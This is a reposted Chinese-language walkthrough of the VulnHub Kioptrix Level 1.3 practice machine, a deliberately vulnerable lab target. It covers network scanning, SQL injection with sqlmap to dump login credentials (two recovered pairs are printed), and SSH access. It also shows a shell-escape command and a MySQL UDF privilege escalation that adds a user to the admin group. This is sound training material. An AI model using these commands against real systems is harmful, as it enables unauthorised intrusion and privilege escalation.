VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3相关的知识,希望对你有一定的参考价值。

环境下载

戳此进行环境下载

KIOPTRIX: LEVEL 1靶机搭建

由于压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘

将原来的硬盘删去,选择下载好的靶机硬盘,并将网络适配器设置为NAT模式

打开靶机即可

渗透测试

信息搜集

用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
得到目标靶机的IP为:192.168.246.136

用Nmap探测一下目标靶机IP的端口信息:sudo nmap -sS -A 192.168.246.136,发现开放了22、80、139、445四个端口

用dirb扫描一下web目录:dirb http://192.168.246.136

漏洞挖掘

测试登录框,发现疑似存在SQL注入漏洞

用burpsuite抓包,扔进sqlmap中,成功得到Payload

利用sqlmap爆数据库名

利用sqlmap爆members数据库的表名

利用sqlmap爆字段名

利用sqlmap爆数据,得到两组用户名和密码

robert:ADGAdsafdfwt4gadfga==
john:MyNameIsJohn  

getshell

用前面注入得到的两组数据成功连接ssh

利用echo,切换到交互式的shell:echo os.system('/bin/bash')

查找网站相关内容信息,发现数据库没有密码

提权

尝试 mysql udf 提权

首先找到 lib_mysqludf_sys.so 的目录

接着创建函数 create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

利用 SELECT sys_exec('usermod -aG admin john'); 将 john 加入管理员组

尝试切换到root用户,成功拿到root权限

补充

可以尝试用sqlmap来完成提权,参考文章

以上是关于VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3的主要内容,如果未能解决你的问题,请参考以下文章

VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1

VulnHub渗透测试实战靶场-HA: FORENSICS

VulnHub渗透测试实战靶场 - FUNBOX: CTF

VulnHub渗透测试实战靶场 - Funbox: GaoKao

VulnHub渗透测试实战靶场 - DevContainer:1

VulnHub渗透测试实战靶场 - Funbox: GaoKao